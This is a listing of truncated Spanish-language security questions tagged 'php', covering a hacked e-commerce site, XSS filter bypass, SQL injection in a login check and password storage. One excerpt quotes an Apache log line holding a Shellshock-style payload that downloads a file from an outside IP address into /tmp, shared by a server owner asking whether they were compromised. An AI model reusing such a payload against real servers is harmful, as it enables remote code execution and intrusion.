Preguntas con etiqueta 'php'

preguntas con etiqueta
2
respuestas

¿Sitio extraño de Spam Pharma resultante de un archivo DAT creado por Inyección SQL?

Trabajando en la limpieza de un compromiso del sitio para un cliente. Dejando de lado que el sitio está utilizando un montón de código CodeIgniter personalizado escrito por alguien que no tenía ningún concepto de seguridad, me he topado con un o...
hecha 22.07.2012 - 19:41
1
respuesta

sigsegv en php5.3.10

Encontré una situación de desbordamiento en php5.3.10. Probablemente no sea 'algo nuevo', pero si puedo entender esto, Me ayudará a encontrar este tipo de error más rápido en el futuro. ¿Qué puedo hacer para verificar cómo / qué / dónde oc...
hecha 05.11.2012 - 07:21
1
respuesta

Sitio pirateado - ¿A dónde ir desde aquí? [cerrado]

Nuestro sitio de comercio electrónico basado en magento fue pirateado durante el fin de semana, los hackers lograron acceder a los archivos de magento e incrustar un código codificado en el archivo get.php en el directorio raíz. Logré descifr...
hecha 10.06.2013 - 08:59
2
respuestas

¿Cómo omitir la función htmlentities () en PHP para obtener un XSS?

Aquí está la función de filtro PHP con la que estoy tratando: function xss_check_2($data) { return htmlentities($data, ENT_QUOTES); } El código fuente de la salida (la salida es el nombre, Peter Wazinck, en la parte inferior): <...
hecha 21.12.2017 - 19:43
1
respuesta

Los registros de Apache muestran la ejecución de los comandos

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bi...
hecha 28.12.2017 - 19:24
2
respuestas

¿es seguro usar sha256 para hash 64 datos de bytes criptográficamente aleatorios con sal de 12 bytes?

Leí en muchas fuentes que sha256 no es seguro porque es rápido. La mayoría de los enlaces que leí sugirieron bcrypt . Sin embargo, solo quiero saber que si los datos son 64 bytes criptográficamente aleatorios, ¿el atacante podrá enc...
hecha 08.02.2018 - 20:50
1
respuesta

Correlación entre la solicitud del servidor y el tiempo de respuesta y las funciones incorporadas de PHP

¿Hay alguna forma de identificar qué función de PHP incorporada se usa en un script dado solo enviando una solicitud y recibiendo una respuesta del servidor remoto? Para mantenerlo simple, podemos suponer que es un script PHP muy simple que c...
hecha 16.05.2017 - 20:40
1
respuesta

Inyección de SQL de autenticación de usuario [cerrado]

¿Este mecanismo de autenticación es vulnerable a la inyección de SQL? Si es así, ¿cómo podría uno explotarlo y cuál es la forma más efectiva de mitigar esto? if (isset($_POST['userid']) && isset($_POST['password'])){ $username = $_P...
hecha 22.10.2017 - 16:18
2
respuestas

Alterar la variable en un archivo php en un servidor web

El siguiente es un extracto de un script PHP dentro de un archivo HTML. Me gustaría poder alterar la variable cuando recibo el archivo HTML. ¿Hay alguna manera de hacerlo? La mayoría de las vulnerabilidades que encontré en línea son vulnerabilid...
hecha 14.09.2017 - 17:08
1
respuesta

¿Qué tan seguro es almacenar las contraseñas en un archivo no accesible?

Entonces, estaba pensando en soluciones para guardar contraseñas en archivos de texto (solo porque tengo curiosidad), y pensé, ¿y si guardaba mi archivo en algún lugar que no sea accesible? Mi servidor tiene una carpeta public_html donde se encu...
hecha 19.03.2018 - 00:21